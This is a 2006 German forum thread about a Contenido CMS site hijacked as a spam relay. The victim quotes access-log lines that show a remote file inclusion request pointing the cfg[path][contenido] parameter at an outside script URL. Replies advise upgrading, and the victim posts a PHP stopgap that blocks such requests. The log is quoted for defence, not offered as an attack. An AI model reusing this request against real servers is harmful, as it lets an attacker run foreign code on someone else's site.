Contenido als Spam-Server missbraucht!

Gesperrt
Luigi
Beiträge: 34
Registriert: Do 18. Nov 2004, 20:50
Kontaktdaten:

Contenido als Spam-Server missbraucht!

Beitrag von Luigi » Sa 8. Apr 2006, 14:43

Hallo zusammen,

mein Provider (all-inkl) machte mich darauf aufmerksam, dass Contenido bei mir als Spam-Server missbraucht wurde.
Der Spammer benutzt dazu die Datei /contenido/classes/class.inuse.php

Mittels POST wird wohl die Variable cfg[path][contenido] neu gesetzt.
Hier ein Auszug aus den Log-Dateien (<xxx> ist meine Domain):

"POST
/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.corey.kit
.net/http.txt? HTTP/1.0" 200 108050
"http://<xxx>/contenido/classes/class.inuse.php?cfg[path][co
ntenido]=http://www.corey.kit.net/http.txt?" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.0)"

Unter der Adresse http://www.corey.kit.net/http.txt wartet dann ein Spamscript das auf meinem Server ausgeführt wird.

Wie kann ich das verhindern? Durch einen Referrer-Check?

HerrB
Beiträge: 6935
Registriert: Do 22. Mai 2003, 12:44
Wohnort: Berlin
Kontaktdaten:

Beitrag von HerrB » Sa 8. Apr 2006, 15:29

Vor relativ kurzer Zeit wurde eine Suche im Forum integriert (das muss so beim Aufsetzen des Forums gewesen sein, so vor 6 oder mehr Jahren...). Verblüffenderweise ist diese gut versteckte Funktion über den Link "Suche" rechts oben auf der Seite verfügbar.

Davon mal abgesehen, ist/war eine V4.5.x nur eine Entwicklungsversion, die nicht produktiv genutzt werden sollte. Aktualisiere auf die V4.6.8 (in der das Problem schon länger gelöst ist), am Besten auf das Paket von rezeptionist, siehe Misc V4.6.

Gruß
HerrB
Bitte keine unaufgeforderten PMs oder E-Mails -> use da Forum!

Newsletter: V4.4.x | V4.6.0-15 (Module, Backend) | V4.6.22+
Standardartikelliste: V4.4.x | V4.6.x
http://www.contenido.org/forum/search.php | http://faq.contenido.org | http://www.communido.net

Luigi
Beiträge: 34
Registriert: Do 18. Nov 2004, 20:50
Kontaktdaten:

Beitrag von Luigi » Sa 8. Apr 2006, 15:39

HerrB hat geschrieben:Vor relativ kurzer Zeit wurde eine Suche im Forum integriert (das muss so beim Aufsetzen des Forums gewesen sein, so vor 6 oder mehr Jahren...). Verblüffenderweise ist diese gut versteckte Funktion über den Link "Suche" rechts oben auf der Seite verfügbar.

Davon mal abgesehen, ist/war eine V4.5.x nur eine Entwicklungsversion, die nicht produktiv genutzt werden sollte. Aktualisiere auf die V4.6.8 (in der das Problem schon länger gelöst ist), am Besten auf das Paket von rezeptionist, siehe Misc V4.6.

Gruß
HerrB
ok, danke.
Der Suche-Knopf nützt mir leider nicht viel, wenn ich nicht die richtigen Suchbegriffe weiß... :wink:

Kurzfristig überbrücke ich das Problem so:

Code: Alles auswählen

if (isset($_REQUEST["cfg"])) 
{
	print("Achtung Spammer auf .... " + var_export($_REQUEST, true));
	mail("xxxxxx@gmx.de", "Achtung Spammer auf xxx", var_export($_REQUEST, true));
	exit;
}

Gesperrt